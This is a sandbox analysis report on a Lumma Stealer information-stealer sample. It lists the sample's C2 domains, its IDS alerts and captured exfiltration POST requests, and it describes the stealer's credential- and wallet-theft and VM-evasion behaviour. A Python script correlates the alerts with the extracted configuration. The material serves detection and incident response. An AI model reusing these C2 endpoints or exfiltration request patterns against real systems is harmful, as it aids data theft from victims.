Windows Analysis Report
yTRd6nkLWV.exe

Overview

General Information

Sample name: yTRd6nkLWV.exe (renamed because the original name is a hash value)
Original sample name: 276b08cdfcba38b36290db8a3162df343ba0f2bc3d3e48d22928ae61480b8183.exe
Analysis ID: 1590540
MD5: d71663e0a0164a482c1ffc9d2c06539f
SHA1: 25030448b108c3b50fcba933dd7b472d3570dbf4
SHA256: 276b08cdfcba38b36290db8a3162df343ba0f2bc3d3e48d22928ae61480b8183
Tags: exe, THSUPPORTSERVICESLTD, user-JAMESWT_MHT

Detection

LummaC
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates HTML files with .exe extension (expired dropper behavior)
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • yTRd6nkLWV.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\yTRd6nkLWV.exe" MD5: D71663E0A0164A482C1FFC9D2C06539F)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Note that the HTTP requests captured in this analysis carry a Chrome/119.0.0.0 user agent (see the Networking section), not the "TeslaBrowser/5.5" string quoted in the description above; a detection keyed on that user agent alone would miss this build.

Malware configuration (LummaC): {"C2 url": ["leggelatez.lat", "savorraiykj.lat", "kickykiduz.lat", "finickypwk.lat", "washyceehsu.lat", "bloodyswif.lat", "shoefeatthe.lat", "miniatureyu.lat"], "Build id": "dll--"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
00000001.00000003.1473028075.0000000000706000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • matched strings: 0x50fbe:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • matched strings: 0x54554:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: yTRd6nkLWV.exe PID: 7532 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: yTRd6nkLWV.exe PID: 7532 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: yTRd6nkLWV.exe PID: 7532 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security

No Sigma rule has matched
Suricata IDS alerts (one row per alert, sorted by time):

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-14T08:55:29.501594+0100 | 2059209 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 53926 | 1.1.1.1 | 53 | UDP
2025-01-14T08:55:29.512052+0100 | 2059189 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 60418 | 1.1.1.1 | 53 | UDP
2025-01-14T08:55:29.525032+0100 | 2059211 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 53853 | 1.1.1.1 | 53 | UDP
2025-01-14T08:55:29.536919+0100 | 2059201 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 50817 | 1.1.1.1 | 53 | UDP
2025-01-14T08:55:29.555067+0100 | 2059203 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 55020 | 1.1.1.1 | 53 | UDP
2025-01-14T08:55:29.565601+0100 | 2059199 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 63764 | 1.1.1.1 | 53 | UDP
2025-01-14T08:55:29.576398+0100 | 2059207 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 57122 | 1.1.1.1 | 53 | UDP
2025-01-14T08:55:29.590693+0100 | 2059191 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 63949 | 1.1.1.1 | 53 | UDP
2025-01-14T08:55:30.340433+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49784 | 104.102.49.254 | 443 | TCP
2025-01-14T08:55:30.913240+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49784 | 104.102.49.254 | 443 | TCP
2025-01-14T08:55:31.723597+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49795 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:32.157732+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49795 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:32.157732+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49795 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:32.657578+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49801 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:33.142625+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49801 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:33.142625+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.7 | 49801 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:34.216699+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49812 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:35.773469+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49825 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:36.313357+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49825 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:37.163604+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49838 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:38.722180+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49849 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:40.356462+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49860 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:40.360671+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.7 | 49860 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:42.730990+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49876 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:43.203229+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49876 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:43.859968+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49883 | 162.125.66.18 | 443 | TCP
2025-01-14T08:55:45.745487+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49897 | 162.125.66.15 | 443 | TCP
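The alert table above is what Suricata writes to eve.json, one record per line. The Python below is an added example and not part of the Joe Sandbox report: it rebuilds a subset of the report's alerts as EVE records (constructed data, not a real capture; the field layout is Suricata's standard alert record), recovers the C2 domains from the ET rule messages (which defang the TLD with a space, as in "kickykiduz .lat"), checks them against the configuration the extractor pulled from memory, and separates destinations that raised severity-1 alerts from those that only tripped the severity-3 JA3 rule. The last point is the caveat a responder needs: the same JA3 alert (SID 2028371) also fired on the sample's connections to 162.125.66.18 and 162.125.66.15, so the fingerprint alone does not identify the C2 host. Rule names, SIDs, ports and addresses are taken from the report; the helper names are my own.

```python
"""Correlate Suricata EVE alerts with an extracted LummaC configuration.

Added example; the alert tuples are transcribed from the report's Suricata rows
(constructed data, not a real capture). Field names follow Suricata's EVE alert
record: event_type, proto, src_ip, src_port, dest_ip, dest_port, alert.{...}.
"""
import json
import re
from collections import Counter

# Copied from the report's Malware Configuration Extractor output.
LUMMA_CONFIG = {
    "C2 url": ["leggelatez.lat", "savorraiykj.lat", "kickykiduz.lat", "finickypwk.lat",
               "washyceehsu.lat", "bloodyswif.lat", "shoefeatthe.lat", "miniatureyu.lat"],
    "Build id": "dll--",
}

DNS_SIG = "ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup ({})"
JA3_SIG = "ET JA3 Hash - Possible Malware - Fake Firefox Font Update"
JA3_SID = 2028371
C2_CAT = "Domain Observed Used for C2 Detected"
TROJAN_CAT = "A Network Trojan was detected"

# (timestamp, sid, severity, category, signature, src, sport, dst, dport, proto)
RAW_ALERTS = [
    ("2025-01-14T08:55:29.501594+0100", 2059209, 1, C2_CAT, DNS_SIG.format("shoefeatthe .lat"), "192.168.2.7", 53926, "1.1.1.1", 53, "UDP"),
    ("2025-01-14T08:55:29.512052+0100", 2059189, 1, C2_CAT, DNS_SIG.format("bloodyswif .lat"), "192.168.2.7", 60418, "1.1.1.1", 53, "UDP"),
    ("2025-01-14T08:55:29.525032+0100", 2059211, 1, C2_CAT, DNS_SIG.format("washyceehsu .lat"), "192.168.2.7", 53853, "1.1.1.1", 53, "UDP"),
    ("2025-01-14T08:55:29.536919+0100", 2059201, 1, C2_CAT, DNS_SIG.format("leggelatez .lat"), "192.168.2.7", 50817, "1.1.1.1", 53, "UDP"),
    ("2025-01-14T08:55:29.555067+0100", 2059203, 1, C2_CAT, DNS_SIG.format("miniatureyu .lat"), "192.168.2.7", 55020, "1.1.1.1", 53, "UDP"),
    ("2025-01-14T08:55:29.565601+0100", 2059199, 1, C2_CAT, DNS_SIG.format("kickykiduz .lat"), "192.168.2.7", 63764, "1.1.1.1", 53, "UDP"),
    ("2025-01-14T08:55:29.576398+0100", 2059207, 1, C2_CAT, DNS_SIG.format("savorraiykj .lat"), "192.168.2.7", 57122, "1.1.1.1", 53, "UDP"),
    ("2025-01-14T08:55:29.590693+0100", 2059191, 1, C2_CAT, DNS_SIG.format("finickypwk .lat"), "192.168.2.7", 63949, "1.1.1.1", 53, "UDP"),
    ("2025-01-14T08:55:30.340433+0100", JA3_SID, 3, "Unknown Traffic", JA3_SIG, "192.168.2.7", 49784, "104.102.49.254", 443, "TCP"),
    ("2025-01-14T08:55:30.913240+0100", 2858666, 1, C2_CAT, "ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup", "192.168.2.7", 49784, "104.102.49.254", 443, "TCP"),
    ("2025-01-14T08:55:31.723597+0100", JA3_SID, 3, "Unknown Traffic", JA3_SIG, "192.168.2.7", 49795, "188.114.96.3", 443, "TCP"),
    ("2025-01-14T08:55:32.157732+0100", 2054653, 1, TROJAN_CAT, "ET MALWARE Lumma Stealer CnC Host Checkin", "192.168.2.7", 49795, "188.114.96.3", 443, "TCP"),
    ("2025-01-14T08:55:32.157732+0100", 2049836, 1, TROJAN_CAT, "ET MALWARE Lumma Stealer Related Activity", "192.168.2.7", 49795, "188.114.96.3", 443, "TCP"),
    ("2025-01-14T08:55:36.313357+0100", 2048094, 1, "Malware Command and Control Activity Detected", "ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration", "192.168.2.7", 49825, "188.114.96.3", 443, "TCP"),
    ("2025-01-14T08:55:43.859968+0100", JA3_SID, 3, "Unknown Traffic", JA3_SIG, "192.168.2.7", 49883, "162.125.66.18", 443, "TCP"),
    ("2025-01-14T08:55:45.745487+0100", JA3_SID, 3, "Unknown Traffic", JA3_SIG, "192.168.2.7", 49897, "162.125.66.15", 443, "TCP"),
]


def eve_lines(raw=RAW_ALERTS):
    """Serialise the tuples as EVE JSON alert lines, one record per line as Suricata writes them."""
    lines = []
    for ts, sid, sev, cat, sig, src, sport, dst, dport, proto in raw:
        lines.append(json.dumps({
            "timestamp": ts, "event_type": "alert", "proto": proto,
            "src_ip": src, "src_port": sport, "dest_ip": dst, "dest_port": dport,
            "alert": {"signature_id": sid, "severity": sev, "category": cat, "signature": sig},
        }))
    return lines


def parse_eve(lines):
    """Keep only alert events; a real eve.json also carries dns, tls and flow records."""
    events = (json.loads(line) for line in lines if line.strip())
    return [e for e in events if e.get("event_type") == "alert"]


# ET's DNS-lookup rule messages end in "(label .tld)" with the last dot defanged by a space.
DEFANGED_DOMAIN = re.compile(r"\(([a-z0-9.-]+) \.([a-z]+)\)$")


def dns_c2_domains(alerts):
    """Domains recovered (re-fanged) from DNS-lookup alert messages."""
    found = set()
    for a in alerts:
        if a["proto"] != "UDP" or a["dest_port"] != 53:
            continue
        m = DEFANGED_DOMAIN.search(a["alert"]["signature"])
        if m:
            found.add(f"{m.group(1)}.{m.group(2)}")
    return found


def config_coverage(config, alerts):
    """Split the config's C2 list into (seen in DNS alerts, not seen)."""
    configured = set(config["C2 url"])
    seen = dns_c2_domains(alerts)
    return configured & seen, configured - seen


def c2_endpoints(alerts):
    """Severity-1 TCP alerts per destination: the hosts that carried the check-in and exfiltration."""
    return Counter(a["dest_ip"] for a in alerts
                   if a["proto"] == "TCP" and a["alert"]["severity"] == 1)


def ja3_only_destinations(alerts):
    """Destinations whose only alert is the JA3 rule; on their own these are not C2 evidence."""
    sids_by_dst = {}
    for a in alerts:
        if a["proto"] == "TCP":
            sids_by_dst.setdefault(a["dest_ip"], set()).add(a["alert"]["signature_id"])
    return {dst for dst, sids in sids_by_dst.items() if sids == {JA3_SID}}


if __name__ == "__main__":
    alerts = parse_eve(eve_lines())
    seen, missing = config_coverage(LUMMA_CONFIG, alerts)
    print("config C2 domains resolved:", sorted(seen), "missing:", sorted(missing))
    print("severity-1 destinations:", c2_endpoints(alerts).most_common())
    print("JA3-only destinations:", sorted(ja3_only_destinations(alerts)))
```

On the report's data every one of the eight configured domains shows up as a DNS-lookup alert before the first TCP connection, 188.114.96.3 carries the check-in and exfiltration alerts, and the two Dropbox addresses are JA3-only; a blocklist built from `c2_endpoints` rather than from the JA3 rule avoids blocking those.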

AV Detection

Source: yTRd6nkLWV.exe.7532.1.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["leggelatez.lat", "savorraiykj.lat", "kickykiduz.lat", "finickypwk.lat", "washyceehsu.lat", "bloodyswif.lat", "shoefeatthe.lat", "miniatureyu.lat"], "Build id": "dll--"}
Source: yTRd6nkLWV.exe | Virustotal: Detection: 8%
Source: yTRd6nkLWV.exe | ReversingLabs: Detection: 36%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 94.1% probability
Source: yTRd6nkLWV.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: yTRd6nkLWV.exe | Static PE information: certificate valid
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49784 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49795 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49801 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49812 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49825 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49838 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49849 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49860 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49876 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.7:49883 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.7:49897 version: TLS 1.2

Networking

Source: Network traffic | Suricata IDS: 2059199 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat) : 192.168.2.7:63764 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2059201 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat) : 192.168.2.7:50817 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2059209 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat) : 192.168.2.7:53926 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2059207 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat) : 192.168.2.7:57122 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2059203 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat) : 192.168.2.7:55020 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2059191 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat) : 192.168.2.7:63949 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2059189 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat) : 192.168.2.7:60418 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2059211 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat) : 192.168.2.7:53853 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49801 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49801 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49825 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49795 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49795 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49876 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:49784 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.7:49860 -> 188.114.96.3:443
Source: Malware configuration extractor | URLs: leggelatez.lat
Source: Malware configuration extractor | URLs: savorraiykj.lat
Source: Malware configuration extractor | URLs: kickykiduz.lat
Source: Malware configuration extractor | URLs: finickypwk.lat
Source: Malware configuration extractor | URLs: washyceehsu.lat
Source: Malware configuration extractor | URLs: bloodyswif.lat
Source: Malware configuration extractor | URLs: shoefeatthe.lat
Source: Malware configuration extractor | URLs: miniatureyu.lat
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File created: 0A8O8L4RV6JWV8ND8.exe.1.dr
Source: Joe Sandbox View | IP Address: 162.125.66.18
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | IP Address: 104.102.49.254
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49795 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49825 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49838 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49812 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49784 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49876 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49883 -> 162.125.66.18:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49801 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49860 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49897 -> 162.125.66.15:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49849 -> 188.114.96.3:443
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1; Connection: Keep-Alive; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: aleksandr-block.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 45; Host: aleksandr-block.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=RC6TGEQHH2SEL; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 12812; Host: aleksandr-block.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=URVIBBBZEWIGER; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 15050; Host: aleksandr-block.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=F18QAAKN; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 20339; Host: aleksandr-block.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=IB5T9XD3ZG7CKB; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 1345; Host: aleksandr-block.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=ZKRWBOLO1Y; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 574883; Host: aleksandr-block.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 80; Host: aleksandr-block.com
Source: global traffic | HTTP traffic detected: GET /scl/fi/tzw461qf44namwoprtqi1/channels424_banner.jpg?rlkey=ggwr95slh92f24jnfjirjyzys&st=8tyyz5o7&dl=1 HTTP/1.1; Connection: Keep-Alive; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Host: www.dropbox.com
Source: global traffic | HTTP traffic detected: GET /cd/0/get/CiJJBY9fg1s-lnZensg4nW2mGy-2Gq-GsZR54eh5vxAS-adfp4y9q3FJLldfmw9w0FyJuGGMus-FkcNVlxAuTQ8Ra9WJRYaA9VqEUMfCd5FVo2eMnYMFHqbIaiWnVg_3Z1OdxGxQ9KtAX_qhrQxKC2DD/file?dl=1# HTTP/1.1; Connection: Keep-Alive; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Host: ucc3847efbfdc5176cc975eba0f9.dl.dropboxusercontent.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (12 occurrences)
Source: yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/ https://s.ytimg.com; o equals www.youtube.com (Youtube)
Source: yTRd6nkLWV.exe, 00000001.00000003.1558338882.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1528399384.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1473028075.00000000006F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: /www.youtube.com/ https://s.ytimg.com; o equals www.youtube.com (Youtube)
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policy: child-src https://www.dropbox.com/static/serviceworker/ blob: ; img-src https://* data: blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; font-src https://* data: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; frame-ancestors 'self' https://*.dropbox.com ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: 